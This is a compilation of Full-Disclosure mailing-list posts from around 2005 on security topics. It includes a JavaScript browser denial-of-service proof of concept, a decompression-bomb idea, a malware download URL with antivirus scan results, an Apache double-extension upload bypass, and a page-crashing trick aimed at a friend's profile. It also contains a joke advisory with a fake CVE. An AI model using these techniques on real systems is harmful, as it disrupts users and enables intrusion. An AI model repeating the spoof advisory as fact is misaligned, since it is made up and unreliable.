> *to* the shell, you're no longer anonymous, and if you don't connect to the
> shell, you can't use the shell
>
>

Another issue to consider is that a mere user level shell likely lacks
privs to do some of the nasties referenced in some of these posts.  thus,
the friend would not oonly have to allow shell access, but also give away
root on the server as well.

Just a minor point.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] rainbowtables.schmoo.com dead?

[Ron]

Hello,

I found myself in a situation today where I needed to crack a Windows 
password.  I decided that, since I have enough room to store them now, 
I'd grab a table from http://rainbowtables.schmoo.com.  When I went 
there, I discovered, my horror, that I was redirected to a search engine 
page.


Luckily, I managed to crack the passwords in a different way, they were 
like 5-characters alphabetic.  But the problem remains, I'd like to get 
a good rainbow table.


Does anybody know another site where rainbow tables can be downloaded 
for free?  A quick Google search turned up nothing.  If nothing comes 
up, perhaps I'll generate my own tables, but I'd rather not spend months 
doing it.


Thanks,
Ron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Advisory 2006-03-11 DoS Vulnerability in Microsoft PowerPoint

[ron]

Advisory 2006-03-11 DoS Vulnerability in Microsoft PowerPoint

I. BACKGROUND

Advisory marked for immediate release.

II. DESCRIPTION

Sending a specially crafted  malformed  packet to the services communication 
socket can create a loss of service.

III. HISTORY

This advisory has no history.

IV. WORKAROUND

There are no known workarounds.

V. VENDOR RESPONSE

Microsoft PowerPoint has not commented on this issue.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-925992 to this issue.

APPENDIX A. - Vendor Information
http://www.microsoft.com
APPENDIX B. - References
NONE

CONTACT:
*ron [EMAIL PROTECTED]
*1-888-LOL-WHAT
*CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] test

[ron]

checking if this address works on the list
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] happy new year.

[Ron]

teh kids wrote:

i suppose its about time i passed this on.

http://www.geocities.com/teh_kids/index.html 



it reminds me of the windoze 95 days, not seen _anything_ like this for 
a long long time.


In case anybody cares, this does NOT work on Windows 98 (ha!).

Also, in case you don't feel like checking, it can be used to crash 
users on:

- myspace
- smf
- invision power board

NOT affected:
- vBulletin


And, of course, anywhere else where html is allowed.

It's especially fun to change your friend's myspace page so he can't get 
to it to fix it.  Good times.. :)


Merry Christmas!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [EEYEB-20050523] Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

[Ron]

Some versions of Nessus can log in through SSH and check the system 
locally.  I'm unsure if Retina can do that, but it wouldn't surprise me.


Joshua Russel wrote:

It is a local vulnerability, then how does Retina claims to scan it remotely?


On 12/13/05, Advisories <[EMAIL PROTECTED]> wrote:

Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

Release Date:
December 13, 2005

Date Reported:
May 23, 2005

External Refferences:
eEye ID# EEYEB-20050523
OSVDB ID# 18823
CVE # CAN-2005-2827
Microsoft #  MS05-055

Severity:
Medium (Local Privilege Escalation to Kernel)

Systems Affected:
Windows NT 4.0
Windows 2000

Overview:
eEye Digital Security has discovered a local privilege escalation
vulnerability in the Windows kernel that could allow any code executing
on a Windows NT 4.0 or Windows 2000 system to elevate itself to the
highest possible local privilege level (kernel).  For example, a
malicious user, network worm, or e-mail virus could take advantage of
this vulnerability in order to completely compromise the vulnerable
system on which the exploit code is executing, regardless of that code's
original privilege level.

The vulnerability exists in the thread termination routine contained
within NTOSKRNL.EXE.  Through a specific series of steps, a local
attacker can cause the code responsible for discarding queued
Asynchronous Procedure Call (APC) entries to erroneously attempt to free
a region of kernel data, producing a "data free" vulnerability that may
be exploited in order to alter arbitrary kernel memory, or even divert
the flow of execution directly.

Technical Details:
The basis of this vulnerability is in PspExitThread's APC freeing loop
and in the behavior of KiMoveApcState, invoked from KiAttachProcess and
KeUnstackDetachProcess.  We'll give a description of the problem below,
followed by a "call flow" illustration to outline the specific sequence
of events.

When a thread is exiting, PspExitThread will detach the thread's APC
queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so that
each queue is now a circular, doubly-linked list in which the first and
last nodes do not point back to the list head (LIST_ENTRY structure).
However, since the list heads' pointers are not modified, the purpose is
presumably just to allow the APC freeing loop within PspExitThread to
walk each list and free its nodes, without navigating back to the list
head and erroneously attempting to free memory within the ETHREAD
structure.  Of course, the vulnerability is that this can be made to
happen, and the result is a "data free" condition that eventually causes
ExFreePoolWithTag to operate on user memory.

APCs queued by an external process count against that process's pool
quota, and therefore the quota block of the pool block containing the
APC structure has a reference to the queuing process.  If the exiting
thread contains an APC queued by a now-terminated external process in
its lists, and if that APC node represents the last reference to the
process's Process object, then freeing that node will cause the Process
object to be destroyed from within ExFreePoolWithTag.  Part of this
sequence involves executing PspProcessDelete, which switches to the
ending process's address space using KeStackAttachProcess, calls
PspExitProcess, and then reverses the switch with
KeUnstackDetachProcess.

Both the "attach" and "detach" functions call KiMoveApcState, which is
intended to temporarily strip the thread of its APCs so that none are
dispatched in an address space for which they were not intended, then
re-link the list of APCs after the thread's native address space is
reinstated.  During attach, the ETHREAD.ApcState structure is
duplicated, and the pointers of the lists' first and last nodes are
adjusted to refer to the copy.  Upon detach, the first and last nodes'
pointers are adjusted to re-link the lists to the original
ETHREAD.ApcState -- even though they were supposed to remain
disconnected, since the APC free loop is still in progress.  The end
result is that the free loop will continue and attempt to free a portion
of the ETHREAD structure as though it were a pool block header,
culminating in the kernel operating on attacker-supplied pointers from
user-land memory, because the accessed portion of ETHREAD contains
predictable and mostly zeroed values.

The following depicts the sequence of function calls and parameters
involved in producing the vulnerable condition:

. PspExitThread
. . KeFlushQueueApc
. . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
. . (APC free loop begins)
. . ExFreePool(1st_APC -- queued by exited_process)
. . . ExFreePoolWithTag(1st_APC)
. . . . ObfDereferenceObject(exited_process)
. . . . . ObpRemoveObjectRoutine
. . . . . . PspProcessDelete
. . . . . . . KeStackAttachProcess(exited_process)
. . . . . . . . KiAttachProcess
. . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
. . . . . . . . . KiSwapProcess
. . . . . . . PspExitProcess(0)
. 

Re: [Full-disclosure] MSN Messanger Virus

[Ron]

Damnit, you posted that while I was cleaning up the results.

FWIW, here's my columnized version of virustotal.com's output:

Antivirus VersionUpdate  Result
AntiVir   6.33.0.61  12.13.2005  TR/Dldr.Banload.ID.4
Avast 4.6.695.0  12.13.2005  no virus found
AVG   71812.08.2005  no virus found
Avira 6.33.0.61  12.13.2005  TR/Dldr.Banload.ID.4
BitDefender   7.212.13.2005 
GenPack:Trojan.Downloader.Banload.ID

CAT-QuickHeal 8.00   12.13.2005  TrojanDownloader.Banload.id
ClamAVdevel-20051108 12.12.2005  no virus found
DrWeb 4.33   12.13.2005  Trojan.DownLoader.5891
eTrust-Iris   7.1.194.0  12.13.2005  no virus found
eTrust-Vet12.3.3.0   12.13.2005  no virus found
Fortinet  2.54.0.0   12.12.2005  W32/Banker.ID!dldr
F-Prot3.16c  12.12.2005  no virus found
Ikarus0.2.59.0   12.13.2005  no virus found
Kaspersky 4.0.2.24   12.13.2005  Trojan-Downloader.Win32.Banload.id
McAfee4649   12.13.2005  PWS-Banker.dldr
NOD32v2   1.1320 12.12.2005  probably unknown NewHeur_PE virus
Norman5.70.1012.13.2005  no virus found
Panda 8.02.0012.13.2005  Trj/Nabload.R
Sophos4.00.0 12.13.2005  no virus found
Symantec  8.012.13.2005  no virus found
TheHacker 5.9.1.054  12.13.2005  no virus found
VBA32 3.10.5 12.13.2005  Trojan-Downloader.Win32.Banload.id


Bernardo Quintero wrote:

Mira las fotos >>> http://hometown.aol.com.au/miralafoto/imagens001.exe

I've run a couple of virus scanners on this file with none of them being
able to figure out what it is.  Anyone have any clues?  Also, I'm having


http://www.virustotal.com

Scan results
File: imagens001.exe
Date: 12/13/2005 19:30:16 (CET)

AntiVir 6.33.0.61/20051213 found [TR/Dldr.Banload.ID.4]
Avast 4.6.695.0/20051213 found nothing
AVG 718/20051208 found nothing
Avira 6.33.0.61/20051213 found [TR/Dldr.Banload.ID.4]
BitDefender 7.2/20051213 found [GenPack:Trojan.Downloader.Banload.ID]
CAT-QuickHeal 8.00/20051213 found [TrojanDownloader.Banload.id]
ClamAV devel-20051108/20051212 found nothing
DrWeb  4.33/20051213 found [Trojan.DownLoader.5891]
eTrust-Iris 7.1.194.0/20051213 found nothing
eTrust-Vet 12.3.3.0/20051213 found nothing
Fortinet 2.54.0.0/20051212 found [W32/Banker.ID!dldr]
F-Prot 3.16c/20051212 found nothing
Ikarus 0.2.59.0/20051213 found nothing
Kaspersky 4.0.2.24/20051213 found [Trojan-Downloader.Win32.Banload.id]
McAfee 4649/20051213 found [PWS-Banker.dldr]
NOD32v2 1.1320/20051212 found [probably unknown NewHeur_PE virus]
Norman 5.70.10/20051213 found nothing
Panda 8.02.00/20051213 found [Trj/Nabload.R]
Sophos 4.00.0/20051213 found nothing
Symantec 8.0/20051213 found nothing
TheHacker 5.9.1.054/20051213 found nothing
VBA32 3.10.5/20051213 found [Trojan-Downloader.Win32.Banload.id]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered

[Ron]

If it's causing a Bluescreen, it's probably not a problem with Firefox. 
 It's looking like it IS a problem with the Windows API, as somebody 
else suggested.


Fósforo wrote:

It works here.

seems it depends on how much ram you've. i got 2 blue screens, after
changed the code a bit. the first one was about MEMORY_MANAGEMENT and
the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
without user interaction, the second one i just've opened firefox, not
the bug file (maybe cache ?)

ps: i've 1Gb of ram

heh
function ex() {
   var buffer = "";
   for (var i = 0; i < 5000; i++) {
   buffer += "A";
   }
   var buffer2 = buffer;
   var buffer3 = buffer2;
   for (i = 0; i < 500; i++) {
   buffer2 += buffer;
   for (i = 0; i < 500; i++) {
buffer3 += buffer2;
   }
   }
   document.title = buffer2;
}
ZIPLOCK says CLICK ME




2006/1/31, ezdy <[EMAIL PROTECTED]>:

and theres no reason for it to be working.
first let's see what's going on - i loaded provided html in firefox
and quitted it.
even quitting firefox took a while, but only slightly longer than usual.
after starting firefox again, it indeed didn't load, stuck in some
kind of disk loop ignoring all macosx ui events.
but not swapping. alright, that's strange:

[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
bin
[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
tail -100
...
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21a000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "\\"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21c000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "A"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "A"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21e000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)

this repeats virtually ad-infinitum until end of history.dat is reached.
note that there is never allocated any memory-the same buffer is
always used, thus no memory leak.
firefox is stuck in loop (and eventually starts, since the string is
finite, in my case
about 30M) but it took way too longer to load. im not a windows user
but since mac is only
step away from it (you know apple, let's take win95 and freebsd and
mix it together) my guess is
it is the same situation of keeping main thread busy and events
cannot be passed down, eventualy
leading to "application is not responding" killbox.

for Z1PL0CK:
Don't stop, keep posting fake "buffer overflows" of #darknet
trademonkeys (this one actually looked funny in the beggining).
This time you made it to get /.ed which is not a bad start, but yo
gonna fly higher!

Because this bug got killed, i've something better for you:
dd if=/dev/zero a 2GB file and gzip it. then just write a php script
which sets content-encoding: gzip and
fpassthru the file. safari rendered 1.2gb system unresponsible in 5
seconds, firefox in about 30. both crashed
on "overflows" like this:

Safari(233,0xa000ed68) malloc: *** vm_allocate(size=125896)
failed (error code=3)
Safari(233,0xa000ed68) malloc: *** error: can't allocate region
Safari(233,0xa000ed68) malloc: *** set a breakpoint in szone_error to
debug

for those interested i can send coredumps

now THATs SOME SERIOUSLY MAD warez (for those who wants to quickly
pollute browser's heap with shellcode: yah, this
is a good way).

sheesh. is this some 'who invent a stupidier dos attack against
browser' contest of some sort or what?

On 8.12.2005, at 20:51, Matt wrote:


Didn't work here, just made the system go a bit sluggish for a
moment, as you would expect when dealing with a 2.5  million
character string.

Firefox :
Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.8) Gecko/20051130
Firefox/1.5
Built with :
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0

Possibly it is crashing the Windows API ?

--
Matt


On 

Re: [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)

[Ron]

I was also unable to replicate it, on Firefox 1.5 i386 Linux EN

[EMAIL PROTECTED] wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

nor a fake , nor you really dont know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longuer to load to
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...



which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <[EMAIL PROTECTED]>

-->
heh
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
ZIPLOCK says CLICK ME


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
/Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
IFxjTMn8Sc0=
=SX09
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bug with .php extension?

[Ron]

Simon Richter wrote:
> I would think this is related to "Options MultiViews", where a file
> generally has many suffixes (file type, language, compression, ...).
> Does this also happen to you (yes, I'm too lazy to try right now) if you
> turn MultiViews off?
>
> Nevertheless, good idea that script authors should possibly be aware
> that any suffix, not just the last, is interpreted.
>
>Simon

Thanks for the response,

That was a good idea, I hadn't thought of it; however, I turned off 
MultiViews, and it still behaves the same way.


I also tried adding more extensions, just out of curiosity.  The 
following files also run as .php files:

  http://www.javaop.com/~iago/test.php.cpp.java
  http://www.javaop.com/~iago/test.php.a.a.a.a.b.b.b.b.c.d.e.f

Interestingly, these files are NOT affected, and don't parse the .php:
  http://www.javaop.com/~iago/test.php.jpeg.bmp.rar
  http://www.javaop.com/~iago/test.php.jpeg.rar

The first of those two behaves as a .bmp, and the second one behaves as 
a .jpeg.


It seems that it uses the last recognized extension when parsing files, 
ignoring everything after it.


Any other ideas?  At this point, I'm unsure whether to call it a bug or 
a feature, and whether to alert Apache about it.  Unless somebody posts 
soon, I'll send a bug report to Apache.


Ron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Bug with .php extension?

[Ron]

I'm not sure whether this is something that's well known, but I've never 
seen anything about it, and I nearly got burned by it, so I figured I'd 
post it here.


In Apache 1.3.33 (untested on any other version), if you have a file 
called file.php.bak, and you navigate to it in the browser, it will run 
on the server as a .php file.  This works with any extension that isn't 
known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.)


This can impact upload scripts, if they don't rename.  I had a script 
that was only allowing a very limited number of file names, including 
.rar.  I realized that I could upload the file test.php.rar, as 
demonstrated here:

http://www.javaop.com/~iago/test.php.rar

(I assure you that that's a .php script, not just that text file).

Resolution: If any script does that, it should be changed such that it 
renames any files, perhaps to a SHA1() hash of the filename, or a 
timestamp, or anything like that.


This problem reminds me of a recent discussion about files like 
file.exe.txt in Windows.


In general, that's good advice anyways, you shouldn't allow any kind of 
user specific filenames.  But just in case somebody is making this 
mistake, be careful!   As I said, I nearly got burnt by this, luckly I 
noticed it before anybody malicious did.


Ron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Hacking hoax...

[Ron]

I'm hosting a bit of a hoax this week (to celebrate December Fool's Day, 
not to be confused with April Fool's Day, which is real).


What I need is some log files that seem to indicate an attack.  I 
already posted some FTP brute-force-looking stuff, but it was pretty weak.


Anybody got some cool looking log files I can borrow?

Thanks!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PHC proudly presents ...

[Ron]

Calling someone else a kid 
just because he has a different mindset or vision is simply childish.


Am I the only one who sees a little bit of irony there?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [FLSA-2005:158801] Updated bzip2 packages fix security issues

[Ron]

I took about 2 minutes out of my life several months ago and created 
rules in Thunderbird which put all those update messages into a special 
folder that I ignore.  It wasn't incredibly hard to do, and now I'm 
happy AND I didn't have to complain on the list! Win-win!


Rembrandt wrote:

Could you please stop mailing your Bug-Fix-Reports aka "Package xyz
updated" to the Full*-Mailinglist?

I'm sure you've an OWN mailinglist for such things.
If not: Create one

Such things just suck and NERVE all others who don't use the OS/Distri.
It's not related to you personaly and you're not the only one.

Kind regards,
Rembrandt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 9, Issue 3

[Ron DuFresne]

On Sat, 5 Nov 2005, Brian Dessent wrote:

> Robert Kim Wireless Internet Advisor wrote:
> >
> > Nick, hi... why would you want to filter out the digests? will this
> > eliminate digests from my subscriptioin?
>
> It would have nothing to do with *sending* the digests, and everything
> to do with stopping tards that hit reply to a 70kb digest containing 20
> messages, add a single word reply without trimming anything, and spew it
> all back to the list.  It also breaks threading when someone replies to
> a digest using a mail client that's too dumb to reply to individual
> mails in a digest.  Don't "security professionals" know how to use email
> for god's sake?

What makes you think at this day in age, "security professionals" are no
more pigeon holed in skills then other IT professionals?  limited tools in
daily use tend to depricate those with skills over a braoder spectrum at
an earlier point of time, let alone that CISSP is the only real
qualification for the claim.

Thanks,



Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security Conference

[Ron Bidule]

Hi, 


For those of you that may be interested. I got this in my inbox.

hack.lu 2005



The purpose of the hack.lu convention is to give an open and free

playground where people can discuss the implication of new

technologies

(mainly security) on society. hack.lu is a balanced convention where

technical and non-technical people can meet each others and share

freely

all kind of information. The convention will be held in the Grand-

Duchy

of Luxembourg on Friday/Saturday 14-15 octobre 2005

(http://www.hack.lu/wiki/index.php/Map). The convention is open and

free

to everyone.



Scope



Topics of interest include, but are not limited to :



    * Software Engineering

    * Honeypots/Honeynets

    * Electronic/Digital Privacy

    * Wireless Network and Security

    * Attacks on Information Systems and/or Digital Information

Storage

    * Electronic Voting

    * Free Software and Security

    * Assessment of Computer, Electronic Devices and Information

Systems

    * Standards for Information Security

    * Legal and Social Aspect of Information Security

    * Software Engineering and Security

    * Forensic Analysis



Agenda



A preview agenda is available including workshops and lectures -

http://www.hack.lu/wiki/index.php/Agenda



Registration



Registration is now open http://www.hack.lu/wiki/index.php/

RegistrationPage



As the hack.lu 2005 event is free, registration is optional but  
highly

recommended.



The 100 first users to register will receive a MISC magazine.



Capture The Flag Contest



A Capture The Flag Contest will be held on Saturday. If you want to

participate and propose a team, feel free to check the web page :

http://www.hack.lu/wiki/index.php/CaptureTheFlag


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security Conference

[Ron Bidule]

For those of you that are interested in :hack.lu 2005The purpose of the hack.lu convention is to give an open and freeplayground where people can discuss the implication of new technologies
(mainly security) on society. hack.lu is a balanced convention wheretechnical and non-technical people can meet each others and share freelyall kind of information. The convention will be held in the Grand-Duchy
of Luxembourg on Friday/Saturday 14-15 octobre 2005(http://www.hack.lu/wiki/index.php/Map). The convention is open and freeto everyone.
ScopeTopics of interest include, but are not limited to :* Software Engineering* Honeypots/Honeynets* Electronic/Digital Privacy* Wireless Network and Security* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting* Free Software and Security* Assessment of Computer, Electronic Devices and Information Systems* Standards for Information Security* Legal and Social Aspect of Information Security
* Software Engineering and Security* Forensic AnalysisAgendaA preview agenda is available including workshops and lectures -
http://www.hack.lu/wiki/index.php/AgendaRegistrationRegistration is now open http://www.hack.lu/wiki/index.php/RegistrationPage
As the hack.lu 2005 event is free, registration is optional but highlyrecommended.The 100 first users to register will receive a MISC magazine.Capture The Flag Contest
A Capture The Flag Contest will be held on Saturday. If you want toparticipate and propose a team, feel free to check the web page :
http://www.hack.lu/wiki/index.php/CaptureTheFlag
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25

[Ron DuFresne]

On Tue, 13 Sep 2005, Gary E. Miller wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Yo Eric!
>
> On Mon, 12 Sep 2005, [EMAIL PROTECTED] wrote:
>
> > What if I am otherhost?  Is there a facility for something like
> > [EMAIL PROTECTED] cat /dev/tcp/me/listen/5000 > yesterhost-hda.img
>
> I just spent some time with "man bash" and the bash source code and do
> not see how to do that.  I am sure they would take a patch.
>
> Maybe someone else has a bright idea on how to accept a tcp/udp
> connection with just bash, or some other universally installed
> unix binary.  A lot of systems do not have nc by default.
>

I beieve this can be done with the real version of korn shell, not the
lightened version that is named pksh though for nost linux dists.  But in
a discusion with a fellow admin here at work a few weeks ago it was shown
that the real korn shell can play tcp and udp very sweetly and simply in
scripts.  I have not the working example at hand here to demo for folks,
but, if needed can get it.  I'm sure the man page and or the o'reilly's
manula documents this.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Automated mass abuse of form mailers

[Ron DuFresne]

On Mon, 12 Sep 2005, n3td3v wrote:

> You're missing the point, as i've tried to outline. This is an active
> project, and written code for such an outbreak is already within the
> hands of  *underground hacker communities*.
>
> If you look at my background posts, as posted earlier on the threat,
> you'll see the lead up.
>



Perhaps, and perhaps you danced about mine and missed them as well.  9 of
10 websites use off the freeshelf code, and most used dated code that was
never written with a mind towards secure.  So if folks are going to use
tools in existence rather then create their own hammers and drills they
should go for other then perhaps the first click in a google search and
find something that was coded with security in mind, rather then the first
link that likely pops up in a google search.  If the code is good that
they incorporate into their designs, then it kinda devalues the current
tools that nasty boys  are using, does it not?  If their tools
reply upon poorly written code, then replacing it with far better code
makes their efforts kinda nill, yes?

Thanks,

Ron DuFresne


> Thanks..
>
> On 9/12/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> > On Mon, 12 Sep 2005, Michael Holzt wrote:
> >
> > > Automated mass abuse of form mailers
> > >
> >
> >[smip]
> >
> >
> >
> > Nothing new really, this has been an issue for many years now.  And often
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Automated mass abuse of form mailers

[Ron DuFresne]

On Mon, 12 Sep 2005, Michael Holzt wrote:

> Automated mass abuse of form mailers
>

[smip]



Nothing new really, this has been an issue for many years now.  And often
the result of folks still using matt's cgi scripts , despite his referecnes and links to the
moere secured version of his and other web based scripts that can be
gotten from:

http://nms-cgi.sourceforge.net/scripts.shtml


Unless one is carefull they often get what they paid for

Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] SSH Bruteforce blocking script

[Ron DuFresne]

And yet, if one was reading the netfilter lists and looking for something
more robust, there is a script that has been maintained for a number of
months now that I'm sure will fit your needs.  I'm too busy and lazy to
get the link to it, but a simple google search should point it out and the
whole set fo nearly bi monthly threads that covers it and it's variants in
detail.

Yet, where one can limit, limiting access to sshd these days is prefered,
as openssl and the openssh code tend to be quite the problem with
maintainance, almost like the 90's with ftpd and sendmail


Thanks,

Ron DuFresne


On Mon, 5 Sep 2005, Michael L Benjamin wrote:

>
> Thanks miah,
>
> I wasn't aware of this functionality in iptables. It doesn't offer the
> kind of permanency or logging that
> I might want, but it's a good suggestion nonetheless for other
> services/situations.
>
> Mike.
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of miah
> Sent: Friday, September 02, 2005 11:56 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] SSH Bruteforce blocking script
>
> If you're running iptables why not make use of hashlimit?  Once a limit
> is reached all connection attempts from that IP would be blocked until
